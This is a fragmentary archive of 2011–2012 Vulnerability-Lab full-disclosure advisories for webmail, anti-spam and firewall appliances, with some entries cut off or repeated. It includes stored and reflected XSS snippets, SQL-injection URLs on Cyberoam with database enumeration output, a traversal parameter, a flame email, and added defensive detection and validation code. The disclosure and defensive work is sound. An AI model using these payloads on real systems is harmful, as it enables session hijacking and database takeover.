Multiple persistent input validation vulnerabilities are detected on the ATMAIL WebMail Admin Application v6.3.4. The vulnerability allows a remote attacker to inject persistent malicious script code. Successful exploitation can result in persistent content manipulation, server-side session hijacking and module context manipulation.

Vulnerable Module(s):
[+] UserManagement Listing - FirstName or LastName
[+] Exception-Handling of the Application - Output
[+] Mass-Mail Input & Output Listing

Picture(s):
../1.1.png
../1.2.png
../2.png

Proof of Concept:
The vulnerabilities can be exploited by a remote attacker with low required user interaction or by local low privileged user accounts. For demonstration or reproduce ...
Code Review: Exception Handling of the Application Service

<div id=primary_content_inner style="padding: 20px; overflow: auto; height: 100%;">
?SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'EXECUTION OF MALICIOUS SCRIPT CODE)' = where'= at= line= 1=
<h2>Application error</h2>
<h3>Exception information:</h3>
<p><b>Message:</b><br/> SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '<iframe src=a onload=alert(PERSISTENT)> where' at line 1</p>
<strong>Thrown in:</strong> /usr/local/atmail/webmail/library/Zend/Db/Statement/Pdo.php, Line #:234, Code #: 42000
<h3>Stack trace:</h3>
<pre>#0 /usr/local/atmail/webmail/library/Zend/Db/Statement.php(300): Zend_Db_Statement_Pdo->_execute(Array)
#1 /usr/local/atmail/webmail/library/Zend/Db/Adapter/Abstract.php(468): Zend_Db_Statement->execute(Array)
#2 /usr/local/atmail/webmail/library/Zend/Db/Adapter/Pdo/Abstract.php(238): Zend_Db_Adapter_Abstract->query('select count(id...', Array)
#3 /usr/local/atmail/webmail/library/Zend/Db/Adapter/Abstract.php(799): Zend_Db_Adapter_Pdo_Abstract->query('select count(id...', Array)
#4 /usr/local/atmail/webmail/application/models/api.php(3270): Zend ......

Code Review: Adding New User - User Management or User Registration

<tr>
<td class=contact_field align=top>Firstname</td>
<td><input class="" maxlength=128 name=UserFirstName id=UserFirstName value=<script>EXECUTION OF MALICIOUS SCRIPT CODE)</script>></td>
</tr>
<tr>
<td class=contact_field align=top>Lastname</td>
<td><input class=default maxlength=128 name=UserLastName id=UserLastName value="Last Name"></td>
</tr>

Code Review: Mass Mail - Output

<td class=label>Filter by domain:</td>
<td class=filterinput><input name=aliasFilter id=aliasFilter class=panelFilter value= <script>EXECUTION OF MALICIOUS SCRIPT CODE)</script> type=text><small>Specify a domain or email to filter results</small></td>
<td class=filterdomain></td>
</tr>
</tbody></table>

Reference(s):
../Exception-Handling-PoC.txt
../MassMail-PoC.txt
../NewUSer-Poc.txt

Risk:
The
[Full-disclosure] SonicWall AntiSpam EMail Security v7.x - Multiple Web Vulnerabilities
Title:
SonicWall AntiSpam EMail Security v7.x - Multiple Web Vulnerabilities

Date:
2012-01-07

References:
http://www.vulnerability-lab.com/get_content.php?id=58

VL-ID:
58

Introduction:
Spam, phishing and virus-infected messages continue to cause great damage to companies worldwide. The costs arising from lost productivity, stolen user identities and the misuse of confidential data can reach astronomical heights. SonicWALL® Email Security (SES) appliances, software and services provide a broad range of anti-spam and e-mail security solutions that meet the security requirements of individuals and of companies with 100,000 employees alike. SonicWALL ensures that you and your company can use e-mail securely, productively and cost-effectively.

(Copy of the Vendor Homepage: http://www.sonicwall.com/de/Email_Security.html)

Abstract:
Vulnerability-Lab Team discovered multiple Web Vulnerabilities on SonicWall's AntiSpam EMail Security Appliance Application v7.x.

Report-Timeline:
2012-01-07: Public or Non-Public Disclosure

Status:
Published

Affected Products:
SonicWall
Product: AntiSpam EMail Security Appliance Application v7.3.1 & older versions

Exploitation-Technique:
Remote

Severity:
High

Details:
1.1
A persistent input validation vulnerability is detected on SonicWall's AntiSpam EMail Security Appliance Application v7.3.x. Remote attackers or low privileged user accounts can manipulate specific application requests via persistent script code injection with low required user interaction. Successful exploitation can result in session hijacking, persistent context manipulation and application-side phishing.

Vulnerable Module(s):
[+] MGMTUser Delegate

1.2
A non-persistent input validation vulnerability is detected on SonicWall's AntiSpam EMail Security Appliance Application.
Remote attackers can force, via high required user interaction, client-side requests to steal session data (cookies).

Vulnerable Module(s):
[+] MTA Queue Report

Picture(s):
../ive1.png

1.3
A redirection vulnerability is detected on SonicWall's AntiSpam EMail Security Appliance Application. The vulnerability allows an attacker to implement a malicious external website into the panel website. The redirect is exploitable via the direction value.

Vulnerable Module(s):
[+] User Mail View

Picture(s):
../redirect.png

Affected Version(s):
SonicWall AntiSpam EMail Security Appliance Application - v7.3.x or v7.3.4.5725 & older versions

Type:
AntiSpam EMail Security Appliance; Comprehensive Box; Unified Threat Management Appliance

Proof of Concept:
These vulnerabilities can be exploited by local or remote attackers. For demonstration or reproduce ...

1.1 Code Review (mgmtuser_message.html): Input Validation Vulnerability (Persistent)

<tr valign=top>
<td valign=middle><input type=radio name=dispositionJunk value=tag checked=checked onclick="javascript:document.forms[0].prefixJunk.focus;"></td><td valign=middle>Tag with <input type=text name=prefixJunk size=10 value=<iframe src=http://test.de onchange="javascript:document.forms[0].dispositionJunk[2].checked=true;"> added to the subject</td>
</tr></table><BR></td></tr><tr bgcolor=#FF><td valign=top><b>Action for messages marked as <font color=#99>Likely Spam</font>:</b></td>
<td valign=top><table width=100% border=0 cellspacing=1 cellpadding=1><tr><td width=15><input type=radio name=dispositionMaybe value=none></td><td>Likely Spam blocking off (deliver messages to recipients)</td></tr><tr><td><input type=radio name=dispositionMaybe value=quarantine></td>
<td>Store in Junk Box and delete after <b>45 days.</b></td></tr><tr>
<td><input type=radio name=dispositionMaybe value=tag checked=checked onclick="javascript:document.forms[0].prefixMaybe.focus;"></td><td>Tag with <input type=text name=prefixMaybe size=10 value=<iframe src=http://test.de onchange="javascript:document.forms[0].dispositionMaybe[2].checked=true;"> added to the subject</td></tr></table>

Reference(URL): http://xxx.xxx.com/mgmtuser_delegate.htm

1.2 BUG: IVE - Non Persistent
URL: http://demo.xxx.com/reports_mta_queue_status.html?hostname=greenland%22%3E%3C*

BUG: IVE - Persistent
URL: http://demo.xxx.com/mgmtuser_delegate.html*

Reference(URL): http://xxx.com/reports_mta_queue_status.html?hostname=greenland%22%3E%3C...

1.3 Code Review (msg_viewer_user_mail.html): Redirection Vulnerability

<form name=msgMessageStoreViewerForm method=post action=/msg_viewer_user_mail.html
[Full-disclosure] ATMAIL WebMail v6.3.4 - Multiple Web Vulnerabilities
Title:
ATMAIL WebMail v6.3.4 - Multiple Web Vulnerabilities

Date:
2012-01-06

References:
http://www.vulnerability-lab.com/get_content.php?id=375

VL-ID:
375

Introduction:
Atmail is a commercial Linux messaging platform provider. The company was founded in 2001 and has its company headquarters located in Peregian Beach, Australia. The company develops webmail, mail-server and groupware solutions built for Linux and other Unix operating systems, and includes the source code under a commercial license. Atmail provides 2 different web based applications which are integrated on appliances or different software types. The first service is the ATWebMail Application, the second is the ATWebMail Admin Application.

(Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/@Mail)

Abstract:
A Vulnerability-Lab researcher discovered multiple Web Vulnerabilities on the famous ATMAIL WebMail Application v6.3.4.

Report-Timeline:
2012-01-06: Public or Non-Public Disclosure

Status:
Published

Affected Products:
ATMAIL
Product: WebMail v6.3.4

Exploitation-Technique:
Remote

Severity:
Medium

Details:
Multiple persistent input validation vulnerabilities are detected on the ATMAIL Web Application v6.3.4. The vulnerability allows a remote attacker to inject persistent malicious script code. Successful exploitation can result in persistent content manipulation, server-side session hijacking and module context manipulation.

Vulnerable Module(s):
[+] EMail - Filter
[+] Calendar - Event Listing

Picture(s):
../1.png
../2.png
../3.png

Risk:
The security risk of the persistent web vulnerabilities is estimated as medium(+).

Credits:
Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve) & Ucha Gobejishvili (longrifle0x)
[Full-disclosure] eFront Enterprise v3.6.10 - File Include Vulnerability
Title:
eFront Enterprise v3.6.10 - File Include Vulnerability

Date:
2012-01-06

References:
http://www.vulnerability-lab.com/get_content.php?id=296

VL-ID:
296

Introduction:
Tailored with larger organizations in mind, eFront Enterprise offers solutions for the management of companies' most valued asset - the people. Based on a coherent approach to human capital management which keeps the workforce actively engaged, the eFront Enterprise platform offers the means of aligning learning programs with business goals to cultivate employee skills and knowledge associated with business performance. eFront Enterprise builds on top of eFront Educational.

(Copy of the Vendor Homepage: http://efrontlearning.net/product/efront-enterprise.html)

Abstract:
A Researcher of the Vulnerability Laboratory Team discovered a remote Directory Traversal vulnerability on the eFront Enterprise CMS v3.6.10.

Report-Timeline:
2011-10-17: Vendor Notification
2011-10-17: Vendor Response/Feedback
2011-11-26: Vendor Fix/Patch
2011-01-06: Public or Non-Public Disclosure

Status:
Published

Affected Products:

Exploitation-Technique:
Remote

Severity:
High

Details:
A remote Directory Traversal vulnerability is detected on eFront's CMS v.3.6.10! The bug allows a remote attacker to request local system files. Successful exploitation of the bug can lead to system or DBMS compromise.

Vulnerable Module(s):
[+] Administration, Trainee & Trainer Section

Vulnerable File(s):
[+] student.php

Vulnerable Param(s):
[+] ?ctg=personal&user=trainee&op=files&download=

Picture(s):
../1.png

Solution:
Restrict the requested content and parse the input to patch the issue.
UPDATE: 2011/10/26 v3.6.10 build 12151
URL: http://www.efrontlearning.net/download

Risk:
The security risk of the Directory Traversal vulnerability is estimated as high(+).

Credits:
Vulnerability Research Laboratory - Chokri B.A (Meister)
[Full-disclosure] Strato FAQ Center 2012 - Cross Site Scripting Vulnerability
Title:
Strato FAQ Center 2012 - Cross Site Scripting Vulnerability

Date:
2012-01-06

References:
http://www.vulnerability-lab.com/get_content.php?id=372
http://www.vulnerability-lab.com/news/get_news.php?id=68

VL-ID:
372

Introduction:
FAQ / Login Support Center of the Strato GmbH ... CMS by STRATO AG, Customer-Care IT - Ostendorff

(Copy of the Vendor Homepage: http://www.strato.de & http://www.strato-faq.de)

Abstract:
A Vulnerability-Lab researcher discovered a non persistent cross site scripting vulnerability in the Strato vendor FAQ center CMS 2012.

Report-Timeline:
2012-01-03: Vendor Notification
2012-01-04: Vendor Response/Feedback
2012-01-05: Vendor Fix/Patch
2012-01-06: Public or Non-Public Disclosure

Status:
Published

Affected Products:

Exploitation-Technique:
Remote

Severity:
Medium

Details:
A non persistent input validation vulnerability has been detected on the Strato vendor FAQ center CMS. The vulnerability allows a remote attacker to hijack customer sessions with a required user interaction (click). Successful exploitation can result in client-side content manipulation, client-side cross site scripting, session hijacking and client-side phishing.

Vulnerable File(s):
[+] Kategories HTML

Vulnerable Module(s):
[+] Search Result - Input Fields & Output Listing

Vulnerable Param(s):
[+] sessionid & sub_kat

Picture(s):
../1.png
../2.png
../3.png

Solution:
To fix the non persistent cross site vulnerability, restrict/parse the input on sub_kat= & sessionid=. Parse the output listing of the vulnerable module and implement exception handling to prevent client-side script code executions.

Risk:
The security risk of the non persistent cross site scripting vulnerability is estimated as medium(-).

Credits:
Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve)
[Full-disclosure] Astaro Security Gateway v8.1 - Input Validation Vulnerability
Title:
Astaro Security Gateway v8.1 - Input Validation Vulnerability

Date:
2011-12-27

References:
http://www.vulnerability-lab.com/get_content.php?id=193

VL-ID:
193

Introduction:
The Astaro Security Gateway 8.101 was designed specifically to protect large enterprises. Based on high-quality Intel-compatible server systems, including dual Intel™ Xeon multi-core processors as well as redundant high-speed hard disks, it offers optimal performance and reliability even for the most demanding environments. This section describes in detail the available security applications, technical details and deployment scenarios.

(Copy of the Vendor Homepage: https://www.astaro.com/de-de/produkte/hardware-appliance/astaro-security-gateway-625)

Abstract:
Vulnerability-Lab Team discovered a persistent Cross Site Scripting issue on Astaro Security Gateway.

Report-Timeline:
2011-12-27: Public or Non-Public Disclosure

Status:
Published

Affected Products:
Astaro Security Gateway v8.1

Exploitation-Technique:
Remote

Severity:
Medium

Details:
A persistent cross site scripting vulnerability is detected on Astaro Security Gateway v8.101. The vulnerability allows a privileged user account to implement malicious persistent script code. The bug is located in the preview function of the certificate delete popup box.

Vulnerable Module(s):
[+] Certificate - Delete Preview Popup Box

Pictures:
../1.png

Proof of Concept:
The vulnerability can be exploited by remote attackers or privileged restricted user accounts. For demonstration or reproduce ...
Site-2-Site VPN - Certificate Management Preview

<div style="left: 300px; top: 220px; z-index: 2000; visibility: visible;" class=iPopUp id=iPopup_2><div class=iPopUpTitle>Please confirm:</div><div class=iPopUpText><p>&#8203;&#8203;&#8203;&#8203;&#8203;Are you sure that you want to delete the X509 certificate with private key object 'INCLUDED PERSISTENT SCRIPTCODE HERE!!!'?</p></iframe></p></div><table border=0 cellpadding=0 cellspacing=0><tbody><tr><td style="padding: 2px;"><div id=btnDefault_iPopup_2 class=button style="width: auto; cursor: pointer; color: black; font-weight: bold;"><div class=button_left></div><div class=button_center style="width: auto;"><span style="font-weight: normal;">OK</span></div><div class=button_right></div></div></td>&#8203;&#8203;&#8203;&#8203;&#8203;<td style="padding: 2px;"><div class=button style="width: auto; cursor: pointer; color: black;"><div class=button_left></div><div class=button_center style="width: auto;"><span style="font-weight: normal;">Cancel</span></div><div class=button_right></div></div></td></tr></tbody></table></div>

../index.dat

Risk:
The security risk of the persistent vulnerability is estimated as medium.

Credits:
Vulnerability Research Laboratory
[Full-disclosure] Barracuda Control Center 620 - Multiple Web Vulnerabilities
Title: Barracuda Control Center 620 - Multiple Web Vulnerabilities
Date: 2011-12-21
References: http://www.vulnerability-lab.com/get_content.php?id=32
VL-ID: 32

Introduction:
Barracuda Networks - Worldwide leader in email and Web security. Control Center Application of Barracuda Networks.
(Copy of the Vendor Homepage: http://www.barracudanetworks.com/ns/products/)

Abstract:
Vulnerability-lab Team discovered multiple Web Vulnerabilities on the Barracuda Control Center 620 appliance/application.

Report-Timeline:
2011-06-03: Vendor Notification
2011-07-12: Vendor Response/Feedback
2011-11-26: Vendor Fix/Patch
2011-12-21: Public or Non-Public Disclosure

Status: Published

Affected Products:
Barracuda Control Center 620

Exploitation-Technique: Remote
Severity: Medium

Details:
1.1 Multiple persistent Input Validation vulnerabilities are detected on Barracuda's Control Center 620. A local low privileged user account can implement/inject malicious persistent script code. When exploited by an authenticated user, the identified vulnerabilities can lead to information disclosure, access to intranet-available servers and manipulated persistent content.

Vulnerable Module(s): (Persistent)
[+] authdblookup-input

1.2 Multiple non-persistent Input Validation vulnerabilities are detected on Barracuda's Control Center 620 appliance. Attackers can form malicious client-side requests to hijack customer/admin sessions. Successful exploitation requires user interaction and can lead to information disclosure, session hijacking and access to servers in the intranet.

Vulnerable Module(s): (Non-Persistent)
[+] editdevices
[+] main

Picture(s):
../control1.png
../control2.png
../control3.png

Proof of Concept:
The vulnerabilities can be exploited by low privileged user accounts or by remote attackers via high required user interaction. For demonstration or reproduce ...

1.1 Persistent
https://127.0.0.1:8080/bcc/authdblookup-input.jsp?selected-user=gu...@barracuda.com&selected-node=

Manually reproduce ...
1. Login
2. Switch to the vulnerable authdblookup-input.jsp add mask
3. Include your own malicious persistent script code (java-script or html) and save the input
4. The stored script code will be executed in the main-bar as stable output result (persistent)

1.2 Non-Persistent
https://127.0.0.1:8080/bcc/editdevices.jsp?device-type=spyware&selected-node=1&containerid=[IVE]
https://127.0.0.1:8080/bcc/main.jsp?device-type=[IVE]

Solution:
After the issues in 2011 Barracuda implemented a validation mask to filter malicious disallowed inputs. The Barracuda firmware of the filter has been updated multiple times.

Risk:
1.1 The security risk of the discovered persistent vulnerabilities is estimated as medium(+) because of the low required user interaction.
1.2 The security risk of the discovered non-persistent vulnerabilities is estimated as low because of the high required user interaction.

Credits:
Vulnerability Research Laboratory - Pim J.F. Campers (X4lt)

Copyright © 2011|Vulnerability-Lab
Re: [Full-disclosure] CertificationMagazine - Blind SQL Injection Vulnerability
Hi Tomy,

After you wrote us now the second e-mail we want to make something very clear to u and everyone @ vs-db.info / ariko-security.

1. Your website serves no point other than records of the databases that u dumped... because of the fact that you guys hack illegally into web-servers and dump the databases and do not notify the vendor. You guys tell the researchers around you that you do some security stuff ... i think you guys are just fucking criminals. That's why nobody respects the work you do anywhere.

2. Some weeks ago another ariko-security member asked us ... why we do not work with you guys (vs-db.info ariko-security)? He also asked us multiple times for selling the dumps of hacked databases!? To answer that once more: we are not interested in selling stolen information, as said many times before. Why?! Mainly due to the fact that this is a *criminal* offence. And so a no-go in our vision for the future of vulnerability-lab.com.

3. Also, if you view in context what we do vs. what you do, there is no way we want to work with you.

*We*
- *Inform* vendors
- *Verify* vulnerabilities/bugs to ensure validity
- Disclosure after *contact* with vendor or after multiple tries to contact the vendor
- Disclosure policy
- Try to *protect* vendors and customers of those vendors

*You*
- *Don't* inform vendor
- *No* disclosure policy
- *No* verification other than a picture
- Selling of *illegally* dumped databases/information to make money

4. If so that you say that you are all that good and you are so awesome in what you do, why is a 1.5 year old bug (if this is in fact true) still unpatched when we found it!? Sounds to me that u dumped the database, then probably sold it off and then forgot all about it, instead of contacting the vendor/webmaster etc. So clearly you have no idea of what working in security is about. You are only trying to reap the benefits of a trick that you know.

I hope that you see this as a *wake up call* and *warning* as next time we might not be as friendly.

Best Regards,
The Vulnerability-lab Team.

On 23.12.2011 11:32, Tomy wrote:
> http://www.vs-db.info/?p=593
> MAY 2010 - Nice that you can find 1.5 YEARS old hole LOL!
>
> Tomy
>
> Message written by resea...@vulnerability-lab.com on 20 Dec 2011 at 17:08:
> > http://www.certmag.com/
> > http://www.certmag.com/read.php?in=3656m/read.php?in=3656%27
>
> Tomy supp...@vs-db.info
[Full-disclosure] Kaspersky ISAV 2011/12 - Memory Corruption Vulnerability
Title: Kaspersky ISAV 2011/12 - Memory Corruption Vulnerability
URL: http://www.vulnerability-lab.com/get_content.php?id=129
[Full-disclosure] Cyberoam UTM Appliance - SQL Injection Vulnerability
Title: Cyberoam UTM Appliance - SQL Injection Vulnerability
Date: 2011-12-19
References: http://www.vulnerability-lab.com/get_content.php?id=60
VL-ID: 60

Introduction:
Small and medium enterprises are as much at risk as large enterprises from the targeted attacks of today. They need to protect their networks effectively from external and internal threats without a large security budget. Cyberoam CR50ia, CR100ia, CR200i and CR300i are powerful identity-based unified threat management appliances, delivering comprehensive protection to small and medium enterprises (SMEs) with limited investment in financial and technical resources. The Cyberoam gateway security appliance offers protection from blended threats that include virus, spam, malware, phishing and pharming. Its unique identity-based security based on Layer 8 technology protects enterprises from internal threats that lead to data theft and loss by giving complete visibility into and control over internal users.
(Copy of the Vendor Homepage: http://cyberoam.com/crismes.html)

Abstract:
Vulnerability-Lab Team discovered a SQL Injection Vulnerability on the Cyberoam UTM Security Appliance.

Report-Timeline:
2011-12-19: Public or Non-Public Disclosure

Status: Published

Affected Products:
Cyberoam UTM Appliance CR300i, CR500i v10 & older versions

Exploitation-Technique: Remote
Severity: Critical

Details:
A critical SQL Injection vulnerability is detected on the Cyberoam UTM WAF Appliance v10.x. The vulnerability allows an attacker to inject own sql statements on the affected firewall appliance dbms. Remote attackers can take over the server and compromise the dbms appliance.

Vulnerable Module(s):
[+] Controller - (?mode=301&tableid=[[]]&sort=&dir=)

--- SQL Error Logs ---
java.sql.SQLException: ERROR: each UNION query must have the same number of columns
...
java.sql.SQLException: ERROR: UNION types character varying and integer cannot be matched
...
java.sql.SQLException: ERROR: ORDER BY position 100 is not in select list
java.sql.SQLException: ERROR: ORDER BY position 10 is not in select list
java.sql.SQLException: ERROR: ORDER BY position 9 is not in select list
http://127.0.0.1:8080/corporate/Controller?mode=301&tableid=1%20order%20by%208--&sort=&dir=
java.sql.SQLException: ERROR: ERROR: ORDER BY position 8
org.postgresql.util.PSQLException: No results were returned by the query.
= Columns: 8
...
org.postgresql.util.PSQLException: No results were returned by the query.
...
java.sql.SQLException: ERROR: unterminated quoted string at or near and user_id=0
...
{totalRecords:1,records:[{natprofilename: MASQ ,manage natprofileid : 1 ,isdefault :y}]}
...

Affected Version(s):
[+] Cyberoam UTM Appliance CR300i, CR500i v10 & older versions

Pictures:
../1.png ../2.png ../3.png ../4.png ../5.png ../sql_1.png ../sql_2.png ../os_exec.png

Proof of Concept:
The vulnerability can be exploited by remote attackers with auth. For demonstration or reproduce ...

html head body title p0c /title
iframe src=http://127.0.0.1:8080/corporate/Controller?mode=301&tableid=[SQL-IJ]&sort=&dir=INJECT width=800 height=800
/body /head /html

Reference:
[+] http://xxx.com/corporate/Controller?mode=301&tableid=2&sort=&dir=

--- SQL Access Log ---
current user: 'nobody'
banner: 'PostgreSQL 8.4.3 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20070626 (Red Hat 4.1.2-13), 32-bit'
current database: 'corporate'
database management system users [1]:
[*] nobody
current user: 'nobody'
database management system users privileges:
[*] nobody (administrator) [3]:
    privilege: catupd
    privilege: createdb
    privilege: super
available databases [1]:
[*] corporate
Database: public
[34 tables]
+---------------------------+
| tblapplianceparam         |
| tblappliancespecificparam |
| tblattributes             |
| tblcolumndetail           |
| tblcompany                |
| tblcrevent                |
| tblcrparam                |
| tblcrreplyparam           |
| tblddnsserviceprovider    |
| tblentity                 |
| tblentitygrouprelation    |
| tblfirewallcolumns        |
| tblgroupcolumns           |
| tblicmpcode               |
| tblicmptype               |
| tblieentity
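The PostgreSQL/JDBC errors quoted in this advisory (UNION column-count and type mismatches, a descending walk of ORDER BY positions, an unterminated quoted string) are exactly what an injection probe against a parameter like tableid leaves behind in the application log. As an added example that is not Cyberoam's or Vulnerability-Lab's code, the following Python flags those signatures per client and alerts on a burst or on a column-count walk; the log line layout ("timestamp client-ip path message") is a constructed assumption.

```python
"""Detect SQL-injection probing from PostgreSQL/JDBC error lines in an app log.

Added example, not Cyberoam's or Vulnerability-Lab's code. The line format
"<timestamp> <client-ip> <path> <message>" is an assumption; the error
messages mirror the ones quoted in the advisory.
"""
import re
from collections import Counter
from dataclasses import dataclass, field

# Error signatures typical of blind/UNION injection probing (as in the advisory).
SIGNATURES = {
    "order_by_probe": re.compile(r"ORDER BY position (\d+)"),
    "union_column_mismatch": re.compile(r"each UNION query must have the same number of columns"),
    "union_type_mismatch": re.compile(r"UNION types .+ cannot be matched"),
    "unterminated_string": re.compile(r"unterminated quoted string"),
}

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<ip>\S+)\s+(?P<path>\S+)\s+(?P<msg>.*)$")


@dataclass
class Finding:
    ip: str
    kinds: Counter = field(default_factory=Counter)   # signature -> hit count
    order_by_positions: list = field(default_factory=list)  # in log order
    paths: set = field(default_factory=set)


def classify(msg):
    """Return (signature name, ORDER BY position or None), or (None, None)."""
    for kind, rx in SIGNATURES.items():
        m = rx.search(msg)
        if m:
            pos = int(m.group(1)) if kind == "order_by_probe" else None
            return kind, pos
    return None, None


def is_column_walk(positions):
    """True when a client walks ORDER BY positions strictly downwards
    (100, 10, 9, 8 ...) - the classic way to enumerate the column count."""
    if len(positions) < 2:
        return False
    return all(a > b for a, b in zip(positions, positions[1:]))


def analyse(lines, threshold=3):
    """Aggregate signature hits per client IP and return the clients to alert on:
    either at least `threshold` injection-shaped errors, or an ORDER BY walk."""
    per_ip = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        kind, pos = classify(m["msg"])
        if kind is None:
            continue
        f = per_ip.setdefault(m["ip"], Finding(m["ip"]))
        f.kinds[kind] += 1
        f.paths.add(m["path"])
        if pos is not None:
            f.order_by_positions.append(pos)
    alerts = []
    for f in sorted(per_ip.values(), key=lambda x: x.ip):
        if sum(f.kinds.values()) >= threshold or is_column_walk(f.order_by_positions):
            alerts.append(f)
    return alerts


# Constructed sample log: one probing client, one stray error, one unrelated error.
SAMPLE_LOG = """\
2011-12-19T10:00:01 10.0.0.5 /corporate/Controller java.sql.SQLException: ERROR: each UNION query must have the same number of columns
2011-12-19T10:00:02 10.0.0.5 /corporate/Controller java.sql.SQLException: ERROR: UNION types character varying and integer cannot be matched
2011-12-19T10:00:03 10.0.0.5 /corporate/Controller java.sql.SQLException: ERROR: ORDER BY position 100 is not in select list
2011-12-19T10:00:04 10.0.0.5 /corporate/Controller java.sql.SQLException: ERROR: ORDER BY position 10 is not in select list
2011-12-19T10:00:05 10.0.0.5 /corporate/Controller java.sql.SQLException: ERROR: ORDER BY position 9 is not in select list
2011-12-19T10:00:06 10.0.0.5 /corporate/Controller java.sql.SQLException: ERROR: ERROR: ORDER BY position 8
2011-12-19T10:05:00 10.0.0.9 /corporate/Controller java.sql.SQLException: ERROR: unterminated quoted string at or near and user_id=0
2011-12-19T10:06:00 10.0.0.7 /corporate/Controller org.postgresql.util.PSQLException: connection refused
"""

if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG.splitlines()):
        print(f.ip, dict(f.kinds), f.order_by_positions, sorted(f.paths))
```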
[Full-disclosure] SpamTitan v5.08 - Multiple Web Vulnerabilities
Title: SpamTitan v5.08 - Multiple Web Vulnerabilities
Date: 2011-12-20
References: http://www.vulnerability-lab.com/get_content.php?id=91
VL-ID: 91

Introduction:
SpamTitan Anti Spam is a complete software solution to email security offering protection from Spam, Viruses, Trojans, Phishing and unwanted content.

Feature Set
* Two Anti Virus engines including ClamAV and Kaspersky Labs
* Multi layered Anti Spam analyses resulting in 98% plus Spam detection
* Less than 0.03% False Positive Rate
* Content Filtering
* Inward and outward email scanning
* Email Disclaimer capability
* Simple download and installation process
* Plug and Play Solution
* End user Spam management using email quarantine reports
* Web based administrative GUI
* Multiple automated reports
* Automated updating including anti virus, anti spam, version releases and system backup
* LDAP, Dynamic and aliases file recipient verification
* Per domain administrators
* Per domain reports
* API
* Multi node Cluster

SpamTitan is available in two flavours, SpamTitan ISO and SpamTitan for VMware®, both of which can be downloaded and installed for free.
(Copy of the Vendor Homepage: http://www.spamtitan.com/products)

Abstract:
Vulnerability Lab Team discovered multiple Input Validation Vulnerabilities on the SpamTitan Appliance (Application).

Report-Timeline:
2011-09-15: Vendor Notification
2011-12-20: Public or Non-Public Disclosure

Status: Published

Affected Products:

Exploitation-Technique: Remote
Severity: Medium

Details:
Multiple Input validation vulnerabilities are detected on SpamTitan's security application v5.02.x. The vulnerability allows remote attackers or local low privileged user accounts to manipulate specific application requests or content. Successful exploitation can also result in session hijacking (persistent) on the application side or persistent content manipulation.

Vulnerable Module(s): (Persistent)
[+] Auth-Settings
[+] Setup-Relay
[+] setup-network

Picture(s):
../ive1.png
../ive2.png
../ive3.png

Proof of Concept:
The vulnerabilities can be exploited by remote attackers or local low privileged user accounts. For demonstration or reproduce ...

File: http://www.vulnerability-lab.com:8080/auth-settings.php

tr td class=tagline Email Address: /td
td input type=text name=testaddr style=width: 300px; value=INSERT PERSISTENT SCRIPTCODE HERE!!! /td /tr
tr td Password: /td
td input type=password name=testpass style=width: 300px; value=INSERT PERSISTENT SCRIPTCODE HERE!!! /td

File: http://www.vulnerability-lab.com:8080/setup-relay.php

td input type=text name=hostname style=width: 300px; value=demo.spamtitan.com--INSERT PERSISTENT SCRIPTCODE HERE!!! /td

... or

tr td class=tagline Domain: /td
td input type=text name=domainname style=width: 300px; border-color: red; value=--INSERT PERSISTENT SCRIPTCODE HERE!!! /td
td align=right input class=button type=submit style=width:85px; value=Add onclick=javascript:sform('adddomain', '', false); /td /tr
tr td Destination Server: /td
td input type=text name=mailserver style=width: 300px; value=--INSERT PERSISTENT SCRIPTCODE HERE!!! /td /tr

File: http://www.vulnerability-lab.com:8080/setup-network.php

tr td class=tagline IP Address: /td
td input type=text name=ipaddress style=width: 300px; border-color: red; value=193.120.238.59--test /td
td align=right input class=button type=submit style=width:85px; value=Save onclick=javascript:sform('ifconfig', 'Save', false); /td /tr
tr td class=tagline Subnet Mask: /td
td input type=text name=subnetmask style=width: 300px; value=255.255.255.248--INSERT PERSISTENT SCRIPTCODE HERE!!! /td /tr
tr td class=tagline Default Route: /td
td input type=text name=defaultroute style=width: 300px; value=193.120.238.57--INSERT PERSISTENT SCRIPTCODE HERE!!! /td /tr

References:
http://server.com:8080/auth-settings.php
http://server.com:8080/setup-relay.php
http://server.com:8080/setup-network.php

Risk:
The security risk of the persistent input validation vulnerabilities is estimated as medium(+).

Credits:
Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve)
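The persistent script injection described in the SpamTitan advisory above, and likewise in the Astaro certificate-delete popup and the Whois.Cart order page on this list, comes from storing form values unvalidated and rendering them raw into attribute values and element text. The following is an added example, not code from any of these vendors or from Vulnerability-Lab, of the two defensive layers that close that pattern: allowlist validation for fields that have a semantic type (the advisory's ipaddress, subnetmask, defaultroute, hostname, mailserver, domainname and testaddr fields) and context-aware HTML escaping on output; the helper names are assumptions.

```python
"""Input validation plus output encoding for the form fields named in the advisory.

Added example, not SpamTitan's, Astaro's or Whois.Cart's code. The field
names come from the advisory's setup-network.php / setup-relay.php /
auth-settings.php forms; the helper functions are assumptions.
"""
import html
import ipaddress
import re

# RFC 1123 style hostname: 1-63 char alphanumeric/hyphen labels, no leading or
# trailing hyphen, at most 253 chars overall. Script markup can never pass.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$")
# Structural e-mail check only (no RFC 5322 parsing); rejects quotes and angle brackets.
EMAIL_RE = re.compile(r"^[^@\s<>\"']+@[^@\s<>\"']+\.[A-Za-z0-9-]+$")


def _is_contiguous_mask(addr):
    """A valid netmask is a run of 1-bits followed by 0-bits (255.255.255.248 ok,
    255.0.255.0 not). The complement must then be of the form 2**k - 1."""
    inv = ~int(addr) & 0xFFFFFFFF
    return (inv & (inv + 1)) == 0


def validate_field(name, value):
    """Return the normalised value for a known field or raise ValueError.
    Each field is checked against what it semantically may contain, so a
    payload appended to an address ('193.120.238.59--test') is rejected
    before it is ever stored."""
    v = value.strip()
    if name in ("ipaddress", "defaultroute"):
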